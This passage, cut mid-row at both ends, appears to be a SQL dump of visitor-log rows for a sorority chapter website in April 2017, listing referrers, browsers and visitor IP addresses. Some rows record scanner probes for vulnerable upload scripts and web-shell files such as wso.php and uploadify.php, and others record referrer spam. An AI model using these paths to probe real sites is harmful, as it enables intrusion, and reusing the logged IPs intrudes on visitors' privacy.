Next','Windows','36.0.2130.32','','178.137.83.79','000',7,0),(2857,'2017-04-06','http://zphiblgz.org','LWP','Unknown','Unknown','','216.245.222.101','000',1,0),(2858,'2017-04-06','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',2,0),(2859,'2017-04-06','http://zphiblgz.org/log.php','Chrome','Windows','42.0.2311.152','','163.172.52.168','000',1,0),(2860,'2017-04-06','http://zphiblgz.org','Firefox','Windows','40.1','','117.209.208.77','000',2,0),(2861,'2017-04-06','http://zphiblgz.org','Firefox','Windows','1.0.7','','34.200.222.78','000',1,0),(2862,'2017-04-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','167.114.209.38','000',14,0),(2863,'2017-04-06','http://zphiblgz.org','Chrome','Android','45.0.2454.94','','167.114.209.38','000',1,0),(2864,'2017-04-06','http://zphiblgz.org','Firefox','Windows','40.1','','78.179.115.152','000',1,0),(2865,'2017-04-06','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=ATNpdJ86s_PPGBe9JLAjz2e8X6t4vkyFv7fJlTpCIutnrjvIjzox2A2jDgBxzHgzg0FzNOM3HOrH512QXmyBPomoIS96RnHYYrWqY9yoGNWlyJUSGD-wPMFa1Xg&s=1','MSIE','Windows','11.0','','153.31.113.21','000',2,0),(2866,'2017-04-06','http://xn----7sbbahaq9bb5afgiqfliv4m.xn--p1ai/','MSIE','Windows','6.0','','46.118.115.43','000',4,0),(2867,'2017-04-06','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',6,0),(2868,'2017-04-06','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(2869,'2017-04-06','http://zphiblgz.org/history/','Chrome','Windows','56.0.2924.87','','134.192.191.243','000',1,0),(2870,'2017-04-06','http://zphiblgz.org','Firefox','Windows','40.1','','112.198.76.254','000',1,0),(2871,'2017-04-06','http://zphiblgz.org','Firefox','Windows','40.1','','176.184.237.91','000',1,0),(2872,'2017-04-06','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','198.240.104.140','000',1,0),(2873,'2017-04-06','http://zphiblgz.org','Firefox','Windows','40.1','','31.223.134.254','000',1,0),(2874,'2017-04-06','http://www.zphibmaryland.org/chapters/','Edge','Windows','14.14393','','23.112.82.125','000',5,0),(2875,'2017-04-06','http://zphiblgz.org/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php','Chrome','Windows','42.0.2311.152','','216.244.85.106','000',1,0),(2876,'2017-04-06','https://2dm.prohoster.info/domain-registration/index.php','MSIE','Windows','6.0','','5.248.196.222','000',3,0),(2877,'2017-04-06','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','104.129.194.127','000',5,0),(2878,'2017-04-06','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','71.121.204.212','000',5,0),(2879,'2017-04-07','http://mega-polis.biz.ua/','MSIE','Windows','6.0','','46.118.122.226','000',7,0),(2880,'2017-04-07','http://nodup.ru/','MSIE','Windows','6.0','','37.115.191.53','000',1,0),(2881,'2017-04-07','http://zphiblgz.org/','Chrome','Windows','36.0.1985.97','','195.154.172.80','000',1,0),(2882,'2017-04-07','http://zphiblgz.org/','Opera','Windows','12.17','','23.94.68.165','000',7,0),(2883,'2017-04-07','http://zphiblgz.org/','PHP','Unknown','5.3.52','','23.94.68.165','000',1,0),(2884,'2017-04-07','http://zphiblgz.org','Firefox','Macintosh','29.0','','54.87.115.163','000',1,0),(2885,'2017-04-07','http://pk-pomosch.ru/','Opera','Windows','9.00','','46.118.115.43','000',3,0),(2886,'2017-04-07','http://zphiblgz.org','Unknown','Unknown','Unknown','','34.200.222.78','000',1,0),(2887,'2017-04-07','http://zphiblgz.org','AppleWebKit','Macintosh','600.1.25','','198.204.244.34','000',1,0),(2888,'2017-04-07','http://zphiblgz.org','Firefox','Windows','40.1','','105.103.49.196','000',2,0),(2889,'2017-04-07','http://zarabotat-na-sajte.ru/','MSIE','Unknown','6.0','','46.118.122.226','000',3,0),(2890,'2017-04-07','http://zphiblgz.org','Firefox','Windows','1.0.7','','35.166.69.39','000',1,0),(2891,'2017-04-07','http://zphiblgz.org','Unknown','Unknown','Unknown','','110.83.60.142','000',16,0),(2892,'2017-04-07','http://zphiblgz.org','Chrome','Windows','39.0.2171.95','','198.204.244.34','000',1,0),(2893,'2017-04-07','http://zphiblgz.org','Firefox','Windows','40.1','','41.77.155.50','000',2,0),(2894,'2017-04-07','http://zphiblgz.org','Opera','Windows','12.14','','54.148.105.33','000',1,0),(2895,'2017-04-07','https://www.google.com/','Chrome','Windows','57.0.2987.133','','38.88.231.10','000',2,0),(2896,'2017-04-07','http://mygameplus.com/','MSIE','Windows','6.0','','178.137.164.66','000',3,0),(2897,'2017-04-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(2898,'2017-04-07','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(2899,'2017-04-07','http://zphiblgz.org','Chrome','Android','57.0.2987.132','','205.197.242.161','000',3,0),(2900,'2017-04-07','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.88.55','000',1,0),(2901,'2017-04-07','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1384.JY9eWoFZOeF-ZIZ0beEvrzBbUSvFO-WXThQMz3QOlMNWIUzQjLsG-4RKMTI6MRD-.87250ee26e3d549880a3b98321766a77863f945b&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMIVJNtoWDTa6Ctl47TPu5I&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSTl4bExRX25CZ2tXdWxYN3ZBUng4bHZzNjZKaW5nYUNRZGtSRlJnbzh2Q3NQeTZPSVRqY2ZOdERQbzh3SVVYWEstVFNrb3BxTnAzZW5ERGxsN0ZDNFJVMV81V2h6dEZWOA&b64e=2&sign=5e9743ff3a6ee5df47f6a5a43064d0eb&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlZCit6S4mcbJ3O9RGvOKUG0b-MdCcQRuI53FpUROtiPPB6808Kum_N1ivxF6a9i-Pa20EKE3s2KT3-a8EGT-ue5bGaBMzZnV0AfUpeKLdg7V5EJZ_cGiDa4ar13evaxs_&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCW5ri5MzTNSEk_wtNqFuZWlCspZphMbeT7xHtkShND4cwZciQ__y0g_s8lJwNNv0ZFtKj0DXX32DA&l10n=ru&cts=1491596097978&mc=5.72539518096','Chrome','Windows','31.0.1650.57','','109.63.242.146','000',1,0),(2902,'2017-04-07','https://www.google.com/','Safari','iPhone','10.0','','129.119.235.25','000',1,0),(2903,'2017-04-07','http://zphiblgz.org/wso.php','Chrome','Windows','42.0.2311.152','','163.172.108.151','000',1,0),(2904,'2017-04-07','https://www.google.com/','Edge','Windows','14.14393','','72.81.227.12','000',7,0),(2905,'2017-04-07','https://www.google.com/','Safari','Macintosh','10.0.3','','96.244.61.186','000',1,0),(2906,'2017-04-08','http://zphiblgz.org','Chrome','Macintosh','56.0.2924.87','','195.22.126.221','000',1,0),(2907,'2017-04-08','https://www.google.com/','Chrome','Windows','57.0.2987.133','','76.21.220.89','000',10,0),(2908,'2017-04-08','http://zphiblgz.org','Firefox','Windows','40.1','','220.83.229.22','000',1,0),(2909,'2017-04-08','http://zphiblgz.org','Firefox','Windows','40.1','','95.77.121.228','000',1,0),(2910,'2017-04-08','http://evrotekhservis.ru/','MSIE','Windows','5.5','','37.115.191.53','000',3,0),(2911,'2017-04-08','http://zphiblgz.org','Firefox','Windows','3.6.3','','54.94.157.220','000',1,0),(2912,'2017-04-08','http://zphiblgz.org','Firefox','Windows','40.1','','110.138.66.206','000',2,0),(2913,'2017-04-08','https://www.tattooreligion.ru/','MSIE','Windows','3.02','','46.118.115.43','000',3,0),(2914,'2017-04-08','http://zphiblgz.org','Firefox','Windows','40.1','','86.38.194.169','000',1,0),(2915,'2017-04-08','http://zphiblgz.org','Firefox','Windows','40.1','','156.205.63.201','000',1,0),(2916,'2017-04-08','http://zphiblgz.org','Firefox','Windows','40.1','','121.223.160.177','000',1,0),(2917,'2017-04-08','http://zphiblgz.org','Firefox','Windows','40.1','','46.11.51.180','000',1,0),(2918,'2017-04-08','http://zphiblgz.org','Firefox','Windows','40.1','','206.132.109.60','000',1,0),(2919,'2017-04-08','http://iopeninghours.co.uk/','Unknown','Unknown','Unknown','','37.115.191.53','000',3,0),(2920,'2017-04-08','http://www.zphibmaryland.org/chapters/','Chrome','Windows','57.0.2987.133','','100.36.86.174','000',3,0),(2921,'2017-04-08','http://zphiblgz.org','Firefox','Windows','40.1','','31.31.21.41','000',2,0),(2922,'2017-04-08','http://zphiblgz.org','Firefox','Windows','40.1','','175.158.201.8','000',2,0),(2923,'2017-04-08','http://zphiblgz.org','Edge','Windows','14.14393','','72.81.227.12','000',11,0),(2924,'2017-04-08','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','206.41.167.9','000',1,0),(2925,'2017-04-08','http://zphiblgz.org','Pinterest','Unknown','0.2','','54.236.1.11','000',1,0),(2926,'2017-04-08','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',6,0),(2927,'2017-04-08','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(2928,'2017-04-08','http://xn----7sbbahaq9bb5afgiqfliv4m.xn--p1ai/','MSIE','Windows','6.0','','46.118.115.43','000',2,0),(2929,'2017-04-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','194.9.94.213','000',1,0),(2930,'2017-04-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','69.16.238.208','000',1,0),(2931,'2017-04-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','212.227.109.3','000',1,0),(2932,'2017-04-08','http://zphiblgz.org','Firefox','Windows','40.1','','27.255.35.61','000',1,0),(2933,'2017-04-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','208.113.192.180','000',1,0),(2934,'2017-04-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.27.75','000',1,0),(2935,'2017-04-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','104.236.24.167','000',1,0),(2936,'2017-04-08','http://zphiblgz.org','Firefox','Linux','34.0','','198.204.244.34','000',1,0),(2937,'2017-04-08','http://zphiblgz.org','Chrome','Windows','41.0.2227.0','','195.22.127.195','000',2,0),(2938,'2017-04-08','http://zphiblgz.org','Firefox','Windows','40.1','','41.96.104.71','000',2,0),(2939,'2017-04-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','50.63.196.151','000',1,0),(2940,'2017-04-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.193.42','000',1,0),(2941,'2017-04-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','212.227.29.142','000',1,0),(2942,'2017-04-08','http://nagdak.ru/','Opera','Windows','9.00','','178.137.164.66','000',3,0),(2943,'2017-04-08','http://zphiblgz.org','MSIE','Windows','9.0','','198.204.251.162','000',46,0),(2944,'2017-04-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','213.251.182.111','000',1,0),(2945,'2017-04-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','27.131.109.130','000',1,0),(2946,'2017-04-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','212.97.132.130','000',1,0),(2947,'2017-04-08','http://zphiblgz.org/modules/mod_simplefileuploadv1.3/elements/udd.php','Firefox','Windows','3.5.0','','198.204.251.162','000',3,0),(2948,'2017-04-09','http://zphiblgz.org','MSIE','Windows','9.0','','198.204.251.162','000',11,0),(2949,'2017-04-09','http://zphiblgz.org/uploadify/uploadify.php?folder=/','Firefox','Windows','3.5.0','','198.204.251.162','000',2,0),(2950,'2017-04-09','https://www.google.com/','Chrome','Windows','57.0.2987.133','','76.21.220.89','000',7,0),(2951,'2017-04-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.225.37','000',20,0),(2952,'2017-04-09','http://zphiblgz.org','Chrome','Android','45.0.2454.94','','158.69.225.37','000',1,0),(2953,'2017-04-09','http://zphiblgz.org','MSIE','Windows','11.0','','69.30.222.130','000',5,0),(2954,'2017-04-09','http://time-japan.ru/','MSIE','Windows','6.0','','46.118.115.43','000',4,0),(2955,'2017-04-09','http://zphiblgz.org','Firefox','Windows','40.1','','220.10.121.253','000',2,0),(2956,'2017-04-09','http://zphiblgz.org','Firefox','Windows','40.1','','103.50.147.12','000',1,0),(2957,'2017-04-09','http://krasnodar-avtolombards.ru/','MSIE','Windows','6.0','','5.248.253.49','000',3,0),(2958,'2017-04-09','http://zphiblgz.org','Chrome','Windows','10.0.649.0','','37.59.55.128','000',2,0),(2959,'2017-04-09','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.101.169','000',1,0),(2960,'2017-04-09','https://www.google.com/','Safari','iPad','10.0','','108.224.165.158','000',1,0),(2961,'2017-04-09','http://moskva.nodup.ru/','MSIE','Windows','6.0','','46.118.122.226','000',7,0),(2962,'2017-04-09','http://www.zphibmaryland.org/chapters/','Chrome','Windows','57.0.2987.133','','76.100.36.39','000',8,0),(2963,'2017-04-09','http://zphiblgz.org','Chrome','Linux','39.0.2171.95','','198.204.244.34','000',1,0),(2964,'2017-04-09','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','144.217.80.113','000',1,0),(2965,'2017-04-09','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','96.241.159.113','000',4,0),(2966,'2017-04-09','http://zphiblgz.org','Firefox','Windows','40.1','','39.33.224.68','000',2,0),(2967,'2017-04-09','http://kinoplen.ru/','Opera','Windows','9.0','','37.115.191.53','000',2,0),(2968,'2017-04-09','http://zpg-headteacher.comuf.com/vrazki.html','Firefox','Windows','43.0','','188.129.236.68','000',1,0),(2969,'2017-04-09','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',2,0),(2970,'2017-04-09','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',2,0),(2971,'2017-04-09','http://mcar.in.ua/','Opera','Windows','8.01','','46.118.122.226','000',1,0),(2972,'2017-04-09','http://udsgame.online/','Opera','Windows','9.0','','46.118.126.252','000',2,0),(2973,'2017-04-09','https://www.google.com/','Chrome','Android','57.0.2987.132','','173.46.77.148','000',1,0),(2974,'2017-04-09','http://krasivoe-hd.net/','MSIE','Windows','6.0','','46.118.126.252','000',2,0),(2975,'2017-04-09','http://zphiblgz.org/','MSIE','Windows','6.0','','104.244.231.4','000',1,0),(2976,'2017-04-09','https://www.google.com/','Safari','Macintosh','10.0.1','','100.16.219.122','000',2,0),(2977,'2017-04-09','http://zphiblgz.org','Safari','iPhone','10.0','','173.66.33.223','000',1,0),(2978,'2017-04-09','http://zphiblgz.org','Firefox','Windows','3.6.3','','54.144.2.123','000',1,0),(2979,'2017-04-09','http://zphiblgz.org','python-requests','Unknown','2.7.0','','54.245.152.155','000',7,0),(2980,'2017-04-09','http://zphiblgz.org','Firefox','Macintosh','34.0','','198.204.244.34','000',1,0),(2981,'2017-04-09','http://zphiblgz.org','Firefox','Windows','40.1','','84.110.176.143','000',1,0),(2982,'2017-04-09','http://zphiblgz.org/','Firefox','Windows','33.0','','46.118.124.15','000',1,0),(2983,'2017-04-09','http://zphiblgz.org/','Opera','Windows','12.17','','46.118.124.15','000',7,0),(2984,'2017-04-09','http://zphiblgz.org/','PHP','Unknown','5.3.15','','46.118.124.15','000',1,0),(2985,'2017-04-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.44','000',1,0),(2986,'2017-04-10','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1387.Y9PMIBfgJ8BOekyrDerxAAC5KZPmKWl7rINJxrBW5vf4flZ4U6pn5IiVydsJsQyl.ad845966cce806128026843fdc2b791161c7c8b9&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YOm24rr5dkiDnIjpu2TfUVc&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSTl4bExRX25CZ2tXdWxYN3ZBUng4bHZzNjZKaW5nYUNRZGtSRlJnbzh2Q3N0UWJHc1F2U3R2NWJkN0ZIc3EzZmRDMU9XUkFPVGVrSXVyVUhrdzFuUmRRbEJfbkt4Zms0UQ&b64e=2&sign=c410c8e8bdbba9b0e7b3197ec1d19bdc&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96FcjoUEIfhOg8M4EUM-7vn--uekm-jWS4LQxplprvgkRuYcnJQapNbQ0urch2bR_nP0GwOCkOnoFGORjfu1SqwDN3lF1wbX_oeraNhIthl9KiRviKdvg47RtlLXlge_zs3&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUeNiDU-Ul0AxDwaWI-qSBsFe1l5M1QD27R7eGFyIa31cjlAbwi2jVXKl2GaPvi01RAsH3n6ePcig&l10n=ru&cts=1491800181526&mc=7.39323531997','Chrome','Windows','31.0.1650.57','','109.173.100.12','000',1,0),(2987,'2017-04-10','http://zphiblgz.org','Firefox','Windows','40.1','','212.241.113.150','000',1,0),(2988,'2017-04-10','http://zphiblgz.org','Firefox','Windows','40.1','','110.36.209.82','000',1,0),(2989,'2017-04-10','http://prohoster.info/server/dts-prohoster','MSIE','Windows','7.0a1','','5.248.253.49','000',1,0),(2990,'2017-04-10','http://zphiblgz.org/','Firefox','Windows','43.0','','69.197.144.250','000',1,0),(2991,'2017-04-10','http://zphiblgz.org','Firefox','Linux','3.6.4','','188.165.233.228','000',81,0),(2992,'2017-04-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','185.22.185.214','000',1,0),(2993,'2017-04-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','162.144.80.166','000',1,0),(2994,'2017-04-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','79.170.40.232','000',1,0),(2995,'2017-04-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','119.18.59.154','000',1,0),(2996,'2017-04-10','http://xn-----7kcabaipgeakzcss7bjdqdwpfnhv.xn--p1ai/','Opera','Windows','9.00','','46.118.126.252','000',3,0),(2997,'2017-04-10','https://www.google.com/','Chrome','Android','57.0.2987.132','','99.99.252.84','000',1,0),(2998,'2017-04-10','http://zphiblgz.org','Firefox','Windows','50.0','','203.66.57.176','000',2,0),(2999,'2017-04-10','http://krasnodar.nodup.ru/','MSIE','Windows','6.0','','46.119.112.125','000',2,0),(3000,'2017-04-10','http://zphiblgz.org','Firefox','Windows','40.1','','5.15.231.8','000',2,0),(3001,'2017-04-10','http://zphiblgz.org','Firefox','Windows','40.1','','190.20.199.28','000',1,0),(3002,'2017-04-10','http://www.arenda-yeisk.ru/','MSIE','Windows','6.0','','46.119.118.191','000',5,0),(3003,'2017-04-10','http://zphiblgz.org','Firefox','Windows','40.1','','65.96.107.147','000',2,0),(3004,'2017-04-10','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',49,0),(3005,'2017-04-10','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',12,0),(3006,'2017-04-10','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','123.125.67.225','000',1,0),(3007,'2017-04-10','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','123.125.67.222','000',1,0),(3008,'2017-04-10','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','123.125.67.228','000',1,0),(3009,'2017-04-10','http://zphiblgz.org/ts_teams/kristin-clark/','Firefox','Windows','44.0','','46.118.124.15','000',2,0),(3010,'2017-04-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','89.161.190.234','000',2,0),(3011,'2017-04-10','http://zphiblgz.org/','Firefox','Windows','33.0','','107.172.70.33','000',3,0),(3012,'2017-04-10','http://zphiblgz.org','Firefox','Windows','33.0','','204.12.240.34','000',1,0),(3013,'2017-04-10','https://www.google.com/','Safari','iPhone','10.0','','71.244.146.193','000',4,0),(3014,'2017-04-10','http://zphiblgz.org','Firefox','Windows','34.0','','204.12.240.34','000',11,0),(3015,'2017-04-10','http://zphiblgz.org','Chrome','Windows','39.0.2171.95','','198.204.244.34','000',1,0),(3016,'2017-04-10','http://vektorpress.ru/','MSIE','Windows','5.5','','46.119.112.125','000',2,0),(3017,'2017-04-10','https://www.google.com/','Chrome','Windows','57.0.2987.133','','68.105.154.62','000',1,0),(3018,'2017-04-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.53','000',1,0),(3019,'2017-04-11','http://zphiblgz.org','Firefox','Windows','40.1','','118.97.50.4','000',2,0),(3020,'2017-04-11','http://zpg-headteacher.comuf.com/vrazki.html','Firefox','Windows','43.0','','188.129.236.68','000',1,0),(3021,'2017-04-11','http://zphiblgz.org','Firefox','Windows','40.1','','180.191.61.1','000',1,0),(3022,'2017-04-11','zphiblgz.org','Chrome','Windows','50.0.2661.75','','128.199.194.131','000',12,0),(3023,'2017-04-11','http://hotloans.ru/','MSIE','Windows','6.0','','46.118.115.123','000',8,0),(3024,'2017-04-11','zphiblgz.org','Chrome','Windows','50.0.2661.75','','37.187.132.5','000',12,0),(3025,'2017-04-11','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','144.217.80.113','000',1,0),(3026,'2017-04-11','http://nodup.ru/','Opera','Windows','8.01','','46.119.112.125','000',2,0),(3027,'2017-04-11','http://vykupavto-krasnodar.ru/','MSIE','Windows','6.0','','46.118.126.252','000',4,0),(3028,'2017-04-11','http://oil-td.ru/','MSIE','Windows','6.0','','46.119.118.191','000',2,0),(3029,'2017-04-11','http://zphiblgz.org/xmlrpc.php','Chrome','Windows','53.0.2785.143','','114.205.203.192','000',1,0),(3030,'2017-04-11','http://zphiblgz.org','Firefox','Windows','40.1','','49.156.155.34','000',2,0),(3031,'2017-04-11','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','198.240.86.139','000',1,0),(3032,'2017-04-11','http://zphiblgz.org','Safari','Macintosh','6.2.2','','198.204.244.34','000',1,0),(3033,'2017-04-11','http://zphiblgz.org/','Liferea','Linux','0.x.x','','167.250.73.85','000',1,0),(3034,'2017-04-11','http://zphiblgz.org','Unknown','Unknown','Unknown','','178.137.82.94','000',2,0),(3035,'2017-04-11','http://zphiblgz.org','Firefox','Windows','40.1','','87.49.146.149','000',1,0),(3036,'2017-04-11','http://zarabotat-na-sajte.ru/','MSIE','Windows','7.0a1','','46.118.115.123','000',1,0),(3037,'2017-04-11','http://zphiblgz.org/author/przphiblgz-org/page/2/','Chrome','Windows','48.0.2564.109','','46.161.9.40','000',2,0),(3038,'2017-04-11','https://www.google.com/','Chrome','Macintosh','50.0.2661.94','','66.250.190.21','000',5,0),(3039,'2017-04-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',2,0),(3040,'2017-04-11','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(3041,'2017-04-11','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.66','000',1,0),(3042,'2017-04-11','http://zphiblgz.org','Safari','iPhone','9.0','','100.16.217.214','000',4,0),(3043,'2017-04-11','http://zphiblgz.org/up.php','Chrome','Windows','42.0.2311.152','','51.15.10.29','000',1,0),(3044,'2017-04-11','https://www.google.com/','Safari','iPhone','10.0','','66.87.143.33','000',2,0),(3045,'2017-04-11','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','64.233.172.134','000',1,0),(3046,'2017-04-11','http://zphiblgz.org','Chrome','Windows','36.0.2048.77','','104.144.206.109','000',2,0),(3047,'2017-04-11','http://zphiblgz.org','Unknown','Unknown','Unknown','','72.167.131.121','000',1,0),(3048,'2017-04-11','http://zphiblgz.org','Unknown','Unknown','Unknown','','178.211.40.227','000',1,0),(3049,'2017-04-11','http://zphiblgz.org','Unknown','Unknown','Unknown','','5.61.27.121','000',1,0),(3050,'2017-04-11','http://zphiblgz.org','Firefox','Windows','40.1','','42.3.98.38','000',1,0),(3051,'2017-04-11','http://zphiblgz.org','Unknown','Unknown','Unknown','','210.134.165.14','000',1,0),(3052,'2017-04-11','http://zphiblgz.org','MSIE','Windows','6.0','','93.81.18.102','000',1,0),(3053,'2017-04-11','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1388.8LmzEBOEPewC5mSe5bWjb06M3ZvprNb-GarZ1plwQ6qKp26qSpOnQS6A4ughKgJ9.ae71698b47f567f3359291f6d7225297316f0109&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMkOSpatjLUqgxH-XWLwn-g&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSTl4bExRX25CZ2tXdWxYN3ZBUng4bHZzNjZKaW5nYUNRZGtSRlJnbzh2Q2hwVGhubnJSU0lSZVZUeU9zZmRacE1yU2p4cVNtbGpVNVBTUHJHWmdlQ2RfcGRJY2JUU0pDVQ&b64e=2&sign=17a0c54a222598ce39826328fb7a12e0&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbixRQ1c2GY5DgMjyvPPGx-KaVfFMW-BuuyJhLinV7gTKCDyMKYF69IfhKyJwXKDDO-_IJ0XA3HDd6nwoCdUGSZ-2ikxtiJzkHcHWRr5ago98SUGh6RQuVmu1sZfW3B6v_y&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXboeqr305aINwBZTsQQfiAVHZNIKGUNBzUsXxR1n9J0O-DaG1TsBYUVoL7NNhkwZCrWIvF6GaXOg&l10n=ru&cts=1491969263249&mc=2.06272373306','MSIE','Windows','8.0','','109.63.207.47','000',1,0),(3054,'2017-04-12','http://www.ic-tuebingen.de/','MSIE','Windows','6.0','','46.119.112.125','000',7,0),(3055,'2017-04-12','https://www.google.com/','Chrome','Macintosh','56.0.2924.87','','147.226.236.82','000',3,0),(3056,'2017-04-12','http://prohoster.info/vps/ssd-vps','MSIE','Unknown','6.0','','46.119.118.191','000',2,0),(3057,'2017-04-12','http://zphiblgz.org','Firefox','Linux','30.0','','54.208.247.78','000',1,0),(3058,'2017-04-12','http://www.avtolombard-krasnodar.com/','MSIE','Windows','5.5','','46.118.126.252','000',2,0),(3059,'2017-04-12','http://zphiblgz.org','Safari','iPhone','10.0','','174.205.0.172','000',1,0),(3060,'2017-04-12','https://www.google.com/','Chrome','Android','57.0.2987.132','','174.193.143.158','000',6,0),(3061,'2017-04-12','http://zphiblgz.org','Firefox','Windows','40.1','','112.207.33.36','000',1,0),(3062,'2017-04-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','217.160.62.44','000',1,0),(3063,'2017-04-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','191.252.45.199','000',1,0),(3064,'2017-04-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','69.89.17.11','000',1,0),(3065,'2017-04-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','91.121.93.7','000',1,0),(3066,'2017-04-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','213.251.182.107','000',1,0),(3067,'2017-04-12','http://zphiblgz.org','Firefox','Windows','40.1','','177.195.255.244','000',2,0),(3068,'2017-04-12','http://xn--80aagddcgkbcqbad7amllnejg6dya.xn--p1ai/','Opera','Windows','7.11','','46.119.112.125','000',2,0),(3069,'2017-04-12','http://zphiblgz.org/lgz-celebrates-35-years-service-howard-county-md/','Chrome','Windows','48.0.2564.103','','176.123.5.72','000',4,0),(3070,'2017-04-12','https://www.google.com/','Chrome','Windows','57.0.2987.133','','96.4.235.2','000',1,0),(3071,'2017-04-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','186.202.127.31','000',1,0),(3072,'2017-04-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','212.227.127.144','000',1,0),(3073,'2017-04-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','195.191.161.197','000',1,0),(3074,'2017-04-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','173.192.38.18','000',1,0),(3075,'2017-04-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','68.71.58.194','000',1,0),(3076,'2017-04-12','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',2,0),(3077,'2017-04-12','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(3078,'2017-04-12','http://zphiblgz.org','MSIE','Windows','11.0','','195.154.172.80','000',1,0),(3079,'2017-04-12','https://www.google.com/','Chrome','Windows','57.0.2987.133','','66.244.107.27','000',1,0),(3080,'2017-04-12','http://zphiblgz.org','Firefox','Linux','49.0','','118.163.51.166','000',2,0),(3081,'2017-04-12','http://zphiblgz.org','MSIE','Windows','9.0','','118.163.51.166','000',1,0),(3082,'2017-04-12','http://zphiblgz.org','Firefox','Macintosh','45.0','','118.163.51.166','000',2,0),(3083,'2017-04-12','http://zphiblgz.org','Firefox','Macintosh','51.0','','118.163.51.166','000',1,0),(3084,'2017-04-12','http://zphiblgz.org','Chrome','Windows','52.0.2744.32','','118.163.51.166','000',1,0),(3085,'2017-04-12','http://zphiblgz.org','MSIE','Windows','10.0','','118.163.51.166','000',1,0),(3086,'2017-04-12','http://zphib